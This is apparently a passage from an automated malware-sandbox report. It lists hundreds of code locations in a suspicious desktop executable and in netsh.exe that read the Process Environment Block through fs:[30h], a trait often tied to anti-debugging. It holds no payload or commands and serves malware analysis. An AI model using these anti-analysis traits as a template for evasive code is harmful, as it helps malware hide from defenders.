          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01018E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01028EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03895BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03854257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038090AF mov eax, dword ptr fs:[00000030h]
